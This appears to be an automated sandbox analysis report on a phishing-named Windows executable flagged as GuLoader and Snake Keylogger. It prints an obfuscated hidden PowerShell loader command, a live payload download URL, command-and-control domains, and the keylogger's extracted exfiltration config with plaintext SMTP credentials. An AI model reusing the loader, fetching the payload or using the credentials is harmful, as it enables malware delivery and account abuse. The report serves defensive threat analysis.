Edit tour

Windows Analysis Report
Confirmation transfer Note AGS # 22-00379.exe

Overview

General Information

Sample name:	Confirmation transfer Note AGS # 22-00379.exe
Analysis ID:	1481030
MD5:	baf114ac8dab2634a6f9e33cc67c4b33
SHA1:	66da72ca66c33a928a401d160875f82af9f89bc0
SHA256:	87ab493612c1a0f03673ac9592df018f5f11f9222c03dd7d63b173d9dccb0848
Tags:	exe
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Powershell drops PE file

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Confirmation transfer Note AGS # 22-00379.exe (PID: 5340 cmdline: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe" MD5: BAF114AC8DAB2634A6F9E33CC67C4B33)

powershell.exe (PID: 424 cmdline: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wab.exe (PID: 7476 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

WerFault.exe (PID: 7672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "manjunath_y@bluewavecomputers.in", "Password": "Bluewave@mnc2020", "Host": "mail.bluewavecomputers.in", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.1634084936.000000000A494000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", ParentImage: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe, ParentProcessId: 5340, ParentProcessName: Confirmation transfer Note AGS # 22-00379.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", ProcessId: 424, ProcessName: powershell.exe

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7476, ParentProcessName: wab.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532, ProcessId: 7672, ProcessName: WerFault.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", ParentImage: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe, ParentProcessId: 5340, ParentProcessName: Confirmation transfer Note AGS # 22-00379.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", ProcessId: 424, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", ParentImage: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe, ParentProcessId: 5340, ParentProcessName: Confirmation transfer Note AGS # 22-00379.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", ProcessId: 424, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.7 - Destination IP: 108.167.181.251

Timestamp:	2024-07-25T03:10:19.449026+0200
SID:	2803270
Source Port:	49707
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.7 - Destination IP: 20.189.173.22

Timestamp:	2024-07-25T03:10:49.744744+0200
SID:	2028371
Source Port:	49723
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.7

Timestamp:	2024-07-25T03:10:00.245750+0200
SID:	2022930
Source Port:	443
Destination Port:	49702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.7

Timestamp:	2024-07-25T03:10:38.895890+0200
SID:	2022930
Source Port:	443
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "manjunath_y@bluewavecomputers.in", "Password": "Bluewave@mnc2020", "Host": "mail.bluewavecomputers.in", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: http://aborters.duckdns.org:8081	Virustotal: Detection: 11%	Perma Link
Source: http://anotherarmy.dns.army:8081	Virustotal: Detection: 14%	Perma Link
Source: http://varders.kozow.com:8081	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe	Virustotal: Detection: 58%			Perma Link

Multi AV Scanner detection for submitted file

Source: Confirmation transfer Note AGS # 22-00379.exe	ReversingLabs: Detection: 50%
Source: Confirmation transfer Note AGS # 22-00379.exe	Virustotal: Detection: 58%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Confirmation transfer Note AGS # 22-00379.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.7:49707 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\exe\wab.pdb_j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbVowV source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbd source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdbd source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\exe\wab.pdbwj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb7j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n(C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: nC:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Program Files (x86)\windows mail\wab.PDB source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5987.tmp.dmp.18.dr
Source:	Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000002.00000002.1633101698.0000000008600000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BO$ .pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: wab.pdb-21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32``oj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdblb source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb@ source: WER5987.tmp.dmp.18.dr
Source:	Binary string: wab.pdbaD source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\windows mail\wab.PDB_ source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbBX source: powershell.exe, 00000002.00000002.1622648515.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
Source:	Binary string: !symbols\exe\wab.pdb30 source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: wab.pdbws\wab.pdbpdbwab.pdbmail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\wab.pdbiB source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb` source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Xml.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: mscorlib.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbWj% source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb\| source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb& source: WER5987.tmp.dmp.18.dr
Source:	Binary string: C:\Windows\wab.pdbpdbwab.pdbq source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E

Source: Joe Sandbox View	IP Address: 108.167.181.251 108.167.181.251
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET /wp-includes/NTivwvgavzbeiE97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-includes/NTivwvgavzbeiE97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org

Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.000000002201C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: powershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.1630220347.000000000754A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microw
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.18.dr	String found in binary or memory: http://upx.sf.net
Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, 0000000E.00000002.1925821576.00000000065E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: wab.exe, 0000000E.00000002.1925821576.00000000065E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.bin

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown

HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.7:49707 version: TLS 1.2

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

